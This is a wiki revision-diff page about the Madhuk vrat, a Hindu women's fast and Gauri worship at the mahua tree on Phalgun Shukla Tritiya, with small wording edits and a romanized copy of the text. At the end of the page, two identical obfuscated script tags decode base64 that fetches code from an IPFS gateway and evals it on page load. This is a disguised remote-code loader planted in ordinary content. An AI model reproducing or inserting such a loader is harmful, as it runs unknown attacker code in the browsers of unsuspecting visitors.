Difference between revisions of "मधूक व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह [[व्रत]] [[फाल्गुन]] [[शुक्ल पक्ष|शुक्ल]] तृतीया पर किया जाता है।  
 
*यह [[व्रत]] [[फाल्गुन]] [[शुक्ल पक्ष|शुक्ल]] तृतीया पर किया जाता है।  
 
*स्त्रियों के द्वारा उस दिन [[उपवास]] और दूसरे दिन मघूक पेड़ पर [[गौरी]] की पूजा की जाती है और सौभाग्य, पुत्रों एवं सघवापन के लिए प्रार्थना की जाती है।  
 
*स्त्रियों के द्वारा उस दिन [[उपवास]] और दूसरे दिन मघूक पेड़ पर [[गौरी]] की पूजा की जाती है और सौभाग्य, पुत्रों एवं सघवापन के लिए प्रार्थना की जाती है।  
 
*सघवा ब्राह्मण नारियों का पुष्पों, सुगन्धित द्रव्यों, वस्त्रों एवं भोज्य पदार्थों का सम्मान किया जाता है।
 
*सघवा ब्राह्मण नारियों का पुष्पों, सुगन्धित द्रव्यों, वस्त्रों एवं भोज्य पदार्थों का सम्मान किया जाता है।
*इस व्रत को करने से स्वास्थ्य एवं सौन्दर्य की प्राप्ति होती है।<ref> हेमाद्रि (व्रत0 1, 413-415, भविष्योत्तरपुराण से उद्धरण)</ref>  
+
*इस व्रत को करने से स्वास्थ्य एवं सौन्दर्य की प्राप्ति होती है।<ref> हेमाद्रि (व्रत0 1, 413-415, भविष्योत्तरपुराण से उद्धरण</ref>  
 
*मधूक को [[हिन्दी भाषा|हिन्दी]] में 'महुआ' कहते हैं।  
 
*मधूक को [[हिन्दी भाषा|हिन्दी]] में 'महुआ' कहते हैं।  
 
 
 
 
Line 9: Line 9:
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:47, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat phalgun shukl tritiya par kiya jata hai.
  • striyoan ke dvara us din upavas aur doosare din maghook pe d par gauri ki pooja ki jati hai aur saubhagy, putroan evan saghavapan ke lie prarthana ki jati hai.
  • saghava brahman nariyoan ka pushpoan, sugandhit dravyoan, vastroan evan bhojy padarthoan ka samman kiya jata hai.
  • is vrat ko karane se svasthy evan saundary ki prapti hoti hai.[1]
  • madhook ko hindi mean 'mahua' kahate haian.

 



tika tippani aur sandarbh

  1. hemadri (vrat0 1, 413-415, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>